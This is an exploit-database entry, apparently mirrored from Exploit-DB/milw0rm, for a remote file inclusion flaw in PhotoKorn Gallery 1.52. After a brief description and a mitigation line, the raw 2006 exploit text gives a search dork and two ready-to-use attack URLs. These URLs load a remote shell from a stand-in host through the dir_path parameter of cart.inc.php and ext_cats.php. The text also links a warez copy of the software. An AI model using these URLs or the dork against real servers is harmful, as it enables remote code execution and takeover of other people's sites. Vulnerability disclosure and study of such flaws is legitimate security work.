header-logo
Suggest Exploit
vendor:
PhotoKorn Gallery
by:
Saudi Hackrz
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: PhotoKorn Gallery
Affected Version From: 1.52
Affected Version To: 1.52
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit

PhotoKorn Gallery version 1.52 is vulnerable to a remote file inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a malicious URL in the dir_path parameter of the cart.inc.php and ext_cats.php scripts. This can allow an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

#====================================================================
#PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#=================================================================
#
#Script Name: PhotoKorn Gallery v 1.52
#Script :)
#http://warez.gtasoft.ru/skripts/PhotoKorn.Gallery.(SL).v1.52.PHP.NULL-DGT.zip
#
#=================================================================
#Bug in : cart.inc.php  &  ext_cats.php
#
# <<<<<<<< include_once($dir_path."/footer.php");
#
#in <<<<  includes/cart.inc.php & extras/ext_cats.php & ....... :)
#=================================================================
#
#Dork : photokorn 1.52
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[path]/includes/cart.inc.php?dir_path=http://SHELLURL.COM?
#or
#http://sitename.com/[path]/extras/ext_cats.php?dir_path=http://SHELLURL.COM?
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :All My Frind & Me :)
#www.S3hr.com . www.xp10.com . www.3asfh.net . www.lezr.com .www.king18.org
#===============================================================================

# milw0rm.com [2006-09-07]